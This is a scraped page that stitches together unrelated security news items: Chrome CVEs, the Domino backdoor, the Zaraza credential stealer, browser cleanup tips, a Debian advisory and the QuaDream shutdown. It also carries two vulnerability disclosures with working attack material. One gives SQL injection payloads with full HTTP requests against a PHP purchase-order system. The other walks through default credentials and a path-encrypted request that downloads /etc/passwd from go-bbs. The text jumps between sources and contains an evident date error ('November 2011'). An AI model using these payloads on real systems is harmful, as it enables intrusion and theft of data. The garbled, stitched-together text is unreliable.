Heap buffer overflow in sqlite in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)

CVE-2023-2137

Integer overflow in Skia in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)

**Chrome Releases**

Release updates from the Chrome team

Posted: April 19, 2023 by

There’s a new ransomware gang in town, stitched together from members of well known threat creators to push a new kind of malware focused on punishing unwary organisations. The malware family, called “Domino”, is the brainchild of FIN7 and ex-Conti ransomware members.

Domino has been seen in attacks since at least February 2023 according to researchers at IBM Security Intelligence. Domino is being used to further the spread of backdoors like Cobalt Strike and information stealers such as Project nemesis.

This specific group has previously been seen making use of a malware loader called “Dave Loader”, serving up a variety of well known files like IcedID (a modular banking trojan) and the infamous Emotet. The latter, another banking trojan which branched out into delivering additional malware files, was most recently seen in an IRS themed spam campaign. As the IBM researchers note, both of these are often used as a starting point for ransomware attacks.

Recently, the Dave Loader attacks have been observed including what has now come to be known as Domino files, and the Domino Backdoor in particular. Along with gathering “basic system information”, it receives an encrypted payload once the initial system data has been sent to the command and control center.

The file placed on the target PC was found to be similar enough to the original Domino Backdoor that it’s been named the Domino Loader. This Loader drops a payload called Nemesis Project, a .NET infostealer.

This “project” stealer has been around for a couple of years now, and tries to grab data from numerous browsers and applications including gaming platforms, VPNs, and cryptocurrency wallets. The researchers note that the stealer in question was originally advertised on forums with a sale price of $1,300 and in terms of data theft, the author of the file has this to say:

*   Collection of data from Chromium browsers (passwords, cookies, bookmarks, history)
*   Collection of data from Gecko browsers (cookies, passwords, history)
*   Grabbing links from the desktop
*   Collection of system information in HTML format
*   Telegram sessions
*   Collection of Discord tokens

It can also be set to block startup inside of a virtual machine (often used to test malware files), lock the startup if found to be running in a CIS country, and self-delete after sending the stolen data. Alongside all of this, Nemesis comes with a control panel, operated online, where the data can be accessed. All in all, it’s not something you’d want lurking on your network.

Bleeping Computer highlights that many ransomware groups and malware authors often work together, as it’s frequently an easier way to get a head start on compromising a network. The constant mashing up of files and intrusion tactics makes it harder for organisations to get to grips with the latest wave of attacks and also keeps security researchers on their toes. This current campaign is, sadly, no different.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

**RELATED ARTICLES**

Malware authors join forces and target organisations with Domino Backdoor

The data-stealing malware threatens the cyber safety of individual and organizational privacy by infecting a range of Web browsers.

Using Telegram as its command-and-control (C2) mechanism, a new strain of malware, a bot dubbed Zaraza, is capable of extracting login credentials from a victim's open browser and saving them to a file, as well as taking screenshots of open windows to be saved in a JPG file.

First identified by the Uptycs threat research team, the new bot is capable of stealing credentials from 38 Web browsers, including Google Chrome, Microsoft Edge, and Opera, among others. Once it successfully infects a victim's computer, it sends the information to a Telegram server, where it becomes accessible to potential threat actors. It's believed that the Zaraza bot is linked to Russian hackers, evidenced by the use of the name "Zaraza" which means "infection" in Russian, the researchers said in their report outlining the malware.

The type of login credentials that it steals range from bank accounts to email accounts to online wallets, as well as other sensitive and valuable website targets. This information can provide attackers with the opportunity to commit severe crimes such as identity theft and financial fraud, as well as grant access to personal identifiable information (PII) and, especially in the era of remote work, business accounts. This variant of malware and what it allows attackers to do potentially opens the floodgates to financial loss and "reputational damage," according to the analysis.

"To protect yourself against this malware," the Uptycs researchers wrote, "you should update your passwords regularly, follow online security best practices such as using strong passwords and multi-factor authentication, and ensure regular software and security system updates."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

'Zaraza' Bot Targets Google Chrome to Extract Login Credentials

Categories: News
Tags: Some tips that can enhance your browser's speed

Tags:  so you have more time to enjoy the outdoors

Some tips that can enhance your browser's speed, so you have more time to enjoy the outdoors.



(Read more...)




The post Spring cleaning tips for your browser appeared first on Malwarebytes Labs.

When you are resting up from the physical part of your spring cleaning and you’re sitting behind your laptop or swiping left on your phone, why don’t you speed up your browsing experience with a few simple actions?

Let’s start with your browser, as that usually has the most impact on your perception of how “fast” your device is. In this post we will focus on the settings for Chrome since that is the browser with the biggest market share, but many browsers (like Edge) will have the same settings because they are based on the same Chromium codebase or they will have very similar settings (Firefox). We'll also mention where you can find similar or the same settings in Safari, if available. These will be shown in red.

There may be slight differences in the methodology and screenshots, based on the type of device, the operating system, your language settings, and maybe even the manufacturer of your device, but the basics should be pretty much the same as the Windows-based methods and screenshots shown in this post.

**Backups**

Before we start let’s take some precautions to minimize the chance of having regrets about our actions afterwards.

1\. Backup your currently open bookmarks: More (three dots) > **Bookmarks** > **Bookmark all tabs…** (Safari: In the Menu bar > select **Bookmarks** > then choose **Add Bookmarks for these {number of open} Tabs**.)

This will create a Set of bookmarks of the currently open tabs.

You will see a prompt where you can provide a name for this set of bookmarks. Something with the date in it would make it easier to find if you plan to do this more often.

Name that set and save it by clicking the **Save** button.

2\. Exporting your data can be used to synchronize your browser between devices, but it can also be used as a backup for your data.

To create a backup click on More (three dots) > **Settings** > **Turn on sync…** Then log in to your Google account and access sync settings by clicking on Settings:

(Safari: click the Apple menu in the top left corner of your screen. Then click **System Preferences** > Click **iCloud** > select the checkbox next to **Safari**.)

Then select **Manage what you sync** and turn on **Sync everything** if it’s disabled, or make a custom selection of what you want to back up.

Once you’ve decided what to sync, it’s all automatically available across devices, as long as you sign in with the same Google account. When push comes to shove you can use this as a backup to restore your browser. If you were not using sync between devices before you started, you may want to turn it off once you are satisfied everything went well.

**Speeding up**

1\. Check if you have the latest version of Google Chrome. Updates not only introduce new features, they also improve security and fix bugs.

Under More (three dots) > **Help** > **About Google Chrome** you can find what version you are on. If there is an update available, Chrome will download and install it. When it’s done you need to **relaunch** the browser to complete the update. 

Safari: Go to the Apple menu > **System Settings** > click on **Software Update** > if updates are available click **Restart Now** to install them. Once your macOS has updated, Safari will be up to date too.

2\. Close some of those tabs that open every time you start your browser. Each site will take some time to load and that slows down your browser. Remember, you can create a set of sites that you need every day and the rest can be moved to your bookmarks so you can always find them.

Now you can start closing tabs and create a set of tabs that you would like to start your sessions with. Once all the unnecessary tabs are closed, click on More (three dots) > **Settings** > **On startup**. Select **Open a specific page or set of pages**.

Click on **Use current pages** and the currently open tabs will be the ones you see at the start of every browser session.

Safari: open the tabs you want to start with and use the method outlined under backups to create a set of bookmarks. Name that set of bookmarks, for example “Startup”. Go to **Safari menu** > **Preferences** > select **Choose tabs folder** from the **New windows open with** drop-down list. Select the folder of bookmarks (e.g. Startup) you created. Then, click **Choose****.**

3\. Under **Performance** > **Memory Saver** you can find another way to minimize the impact of your open tabs. When on, Chrome frees up memory from inactive tabs. This gives active tabs and other apps more computer resources and keeps Chrome fast. Your inactive tabs automatically become active again when you go back to them. 

4\. Clean out some clutter you have picked up over time. Click on More (three dots) > **Settings** > **Privacy and security**. Click on **Clear browsing data**. This will open a prompt where you can select which data to clear. The top four are usually the ones you will want to clear. If you are using Chrome as a password manager you will certainly want to leave the fifth one unchecked.

Cookie warning: if you delete all your cookies, you will find that you will have to log in on several sites, so have your password manager ready or be selective about which cookies to delete. If you uncheck **Cookies and other site data** here, you can select which ones to delete if you click More (three dots) > **Settings** > **Privacy and security** > **Cookies and other site data** > **See all site data and permissions**. This allows you to go over a complete list and make more granular decisions. You can use the trash can symbol behind each site’s symbol to remove the site data and permissions.

Or use the dropdown arrow to have even more options.

Safari: Click the Safari menu > **Clear History...** > in the **Clear field** choose **All History** > click **Clear History**.

5\. When it comes to browser extensions that you only use occasionally, you might consider disabling them until you need them. And if you no longer use them at all, remove them. Depending on the type of extension, the difference in surfing speed can be noticeable.

Click More (three dots) > **Settings** > **Extensions** to see an overview of the currently installed browser extensions.

The one(s) with the slide to the right (showing blue) are enabled and the one(s) with the slider to the left (showing in grey) are disabled. Any unwanted or no longer needed extensions can be removed by clicking on the **Remove** button in the extension’s tile.

Safari: Choose **Safari** \> **Settings > Extensions**. To turn off an extension, deselect its checkbox. To uninstall an extension, select the extension and click the **Uninstall** button.

6\. Preload your pages. Click More (three dots) > **Settings** > **Privacy and security** > **Cookies and other site data**. Here you can turn on **Preload pages for faster browsing and searching**.

7\. Scan your device with Malwarebytes to see if any malware is lurking on it. Clearing up any malware on your system is a surefire way to speed it up. And it means you are safer, too!

If you came here looking for a resolution for an extremely slow browser and all of the above didn’t help, there could be other reasons at play. You can try resetting Chrome to default or even uninstall and re-install Chrome.

If a certain site isn’t working properly, you can also try opening the site in an Incognito window. Click More (three dots) and then **New Incognito Window**. Then copy and paste the URL of the problem site in the address bar and see if it works now. If it does solve the issue, then circle back to point 4 and remove all the cookies and data of the domain that the problem site belongs to.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Spring cleaning tips for your browser

Because the security vulnerability is under active exploit, Google isn't releasing full details of the flaw while users could remain vulnerable.

A Google Chrome zero-day vulnerability is under active exploit in the wild, and while details are scarce, users are urged to update their Windows, Mac, and Linux systems to the latest version directly.

The fix for the high-severity bug, being tracked as CVE-2023-2033, is being pushed out through the stable desktop and extended stable channels, and will continue to roll out over the next weeks, Google explained in its April 14 cybersecurity advisory.

The flaw was discovered by Clément Lecigne of Google's Threat Analysis Group on April 11, the company said.

"Access to bug details and links may be kept restricted until a majority of users are updated with a fix," Google added. "We will also retain restrictions if the bug exists in a third-party library that other projects similarly depend on, but haven't yet fixed."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Google Issues Emergency Chrome Update for Zero-Day Bug

A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.

**Purchase Order Management System v1.0 has SQL injection**

BUG\_Author:zito

Website source address:https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability File: /purchase\_order/admin/suppliers/view\_details.php

GET parameter 'id' exists SQL injection vulnerability

Payload1:id=1' and (select 1 from(select count(\*),concat(0x717273,(select (elt(333=333,1))),0x65666768,floor(rand(0)\*2))x from information\_schema.plugins group by x)a) and 'b'='b

    GET /purchase_order/admin/suppliers/view_details.php?id=1%27%20and%20(select%201%20from(select%20count(*),concat(0x717273,(select%20(elt(333=333,1))),0x65666768,floor(rand(0)*2))x%20from%20information_schema.plugins%20group%20by%20x)a)%20and%20%27b%27=%27b HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=fd29fhrp156i09e1labjjoora0
    Connection: close
    

Injection success based on errors

Payload2:id=1' and (select 1 from (select(sleep(10)))x) and 'c'='c

    GET /purchase_order/admin/suppliers/view_details.php?id=1%27%20and%20(select%201%20from%20(select(sleep(10)))x)%20and%20%27c%27=%27c HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=fd29fhrp156i09e1labjjoora0
    Connection: close
    

Server response time is 10 seconds

CVE-2023-2130: bug_report/SQLi.md at main · zitozito1/bug_report

Debian Linux Security Advisory 5390-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5390-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 16, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-2033Debian Bug     : 1034406Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 112.0.5615.121-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQ8MnEACgkQEMKTtsN8TjaGfhAAiJWqYWW3KO7l2i4JBe+vne7rZdEoCMsC7HxhDBbvSBs3sd0bFCUsGTdKqbPcc1l8dX49jcyxF+Fl7y+P/HvvsZ1fb1te5yvbcvVoe1RR+6GQ45Os33eWSVJZsGZ2AHjlHsej2/srOGPcDPOjHv1AgnCIHtJ2OK5MOPWbvyCfRl0T75Whge3XxQGz/KnnYnwQU1bZGT74j8U1FkVDpxeDN+nBah9IElRBCOg2Jkz840tPcftaZdUtQKH2upOg14At/IhqImiYc4HqbsHBSWFHstraskAFK/smXHEYPa2tdBVcLpqjOR9zHRfPpLPPM4yeu8OsU3Sr3YqzZL+xrA/DitENHcDwgkKzNJOHbFXUVX2/nEtrTSG80l+LjFzr4H1N5t6jgPTQf4AQmSjHKAKeVkYooNL2iFV8vfn0LcHgc7AXwGCADQC7hHzAhZaoX9e3Gkjhh9wo1D77zUGC4WcW3kQQXlA4BecfabBN3L+cFJMQPQKf9mOgt3lb2gJzB8cXe1z4PpnQ3JD1X7dkjy+ukpbfyxrFU3WYOPffXyHJ6hqtcYQSG/ktaIZ1RJmB1fI89g9k8/rDaFs4/0GfEA9ZCbKLhFX3FhNNkwkVoBwcbatZiizpDX3wrW3awgk+KKZHE7etFEavqSjaP96cQ3UvvxMd/8NvlkIpz9EgzLy/E74=gB3H-----END PGP SIGNATURE-----

Debian Security Advisory 5390-1

By Waqas
QuaDream, based in Ramat Gan, Israel, with around 40 employees, is known for its spyware used for hacking iPhones. 
This is a post from HackRead.com Read the original post: QuaDream, Israeli iPhone hacking spyware firm, to shut down

****QuaDream, an Israeli cyber mercenary, was recently exposed by Citizen Lab and Microsoft for developing spyware that hacks iPhones.****

QuaDream, a rival spyware developer of NSO Group, is reportedly preparing to shut down its operations. Employees of QuaDream have been summoned for a hearing, and it has been revealed that the company plans to lay off most of its employees, retaining only a small fraction to oversee the closure.

This decision comes amidst a survival crisis faced by the Israeli cyberattack industry, with several companies, including the cyberattack unit of Cognyte and Nemesis, reportedly shutting down. NSO Group also laid off 150 employees in the previous summer.

It is worth noting that Hackread.com also published a report on QuaDream titled “QuaDream: Israeli Cyber Mercenary Behind iPhone Hacks,” based on the findings of Citizen Lab and Microsoft. These findings may have played a significant role in QuaDream’s apparent demise.

Here’s what Eva Galperin, the Director of Cybersecurity at EFF (Electronic Frontier Foundation), had to say about the recent development:

> — Eva (@evacide) April 16, 2023

QuaDream, based in Ramat Gan, Israel, with around 40 employees, is known for its spyware used for hacking iPhones. Sources indicate that the company has notified its employees about the upcoming closure.

QuaDream’s operations have always been shrouded in mystery and came to the forefront recently after it sent a response letter to the Bat Yam Labor Court in defence of a lawsuit brought by a former employee.

Reportedly, in the letter, QuaDream cited a crisis in the cyberattack sector as the reason for laying off employees, with the industry’s downturn starting in 2018 when several companies publicly disclosed their activities, resulting in the blacklisting of Candiru and NSO by the US Chamber of Commerce in November 2011.

The crisis further deepened in early 2022 when the Israeli regulator announced a reduction in the number of countries where companies could sell their products, from 102 to 37, causing a severe economic crisis across the entire industry. By November 2022, businesses reported a significant negative trend, which also impacted QuaDream’s cash flow.

QuaDream was founded by Nimrod Reznik and Ilan Dabelstein, who still serve as senior managers. Its flagship product is an integrated software/hardware system that takes over local networks to hack phones connected to it.

Another popular product is software used for gaining remote access to phones. In 2022, Reuters reported that QuaDream had developed a no-interaction-based zero-click hacking tool similar to NSO Group’s products, which was in high demand among cybercriminals and espionage actors.

However, QuaDream faced a major setback when a report from Microsoft and Citizen Lab revealed that its hacking tools were used against advocacy organizations, journalists, and opposition figures in ten countries, including North America and Europe.

The report also suggested that the spyware used in these attacks was provided by QuaDream. Microsoft’s associate general counsel, Amy Hogan-Burney, emphasized the importance of publicly disclosing the activities of companies like QuaDream to hold them accountable.

Since the publication of this research, QuaDream has not been fully active, and its board of directors is now reportedly looking to sell its intellectual property.

1.  Zippyshare Quits Operation: 10 Best Alternatives
2.  Dark web market for stolen cards UniCC calls it quits
3.  Franco-Israeli Gang Linked to $40m CEO Scam Busted
4.  Israel Hit by Wave of Cyberattacks on Critical Networks
5.  Israeli Spyware Vendor Uses Chrome 0day to Hit Journalists
6.  European Spyware Vendor Sells Android & iOS Device Exploits

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

QuaDream, Israeli iPhone hacking spyware firm, to shut down

go-bbs v1 was discovered to contain an arbitrary file download vulnerability via the component /api/v1/download.

**Install**

1.  Download: git clone https://github.com/gobbscom/go-bbs.git
2.  Create a directory: cd go-bbs && mkdir conf
3.  Copy the configuration file: cp app.conf.example conf/app.conf
4.  Modify the database configuration
5.  Execute ./go-bbs --install to install the database,
6.  Finally execute ./go-bbs to access the corresponding port

**Vulnerability Description AND recurrence**

View routing API routers/router.go line 196  

Follow up the &home.SingleController{} Download method, this interface needs to be logged in, and a user will be added by default through the global search Customer

    UserName: User
    PassWord: 123456
    

Check out router.go, follow up &home.LoginController{}, pass username and password to login  

    POST /login.html HTTP/1.1
    Host: 192.168.19.6:9090
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 29
    
    username=user&password=123456
    

Credentials obtained: beegosessionID=***

The incoming URL needs to be AesDecrypt  

So you need to perform AesEncrypt on the downloaded path

    GET /api/v1/download/1dClk+Blwbf5B9SEDK+l58R84WE7XKXawdq51GCypQo= HTTP/1.1
    Host: 192.168.19.6:9090
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
    Cookie: beegosessionID=6bf662559825c07495e9e8a1e7380180
    Connection: close
    
    
    

Use the credentials to access the downloaded API and successfully download /etc/passwd

Tag

#chrome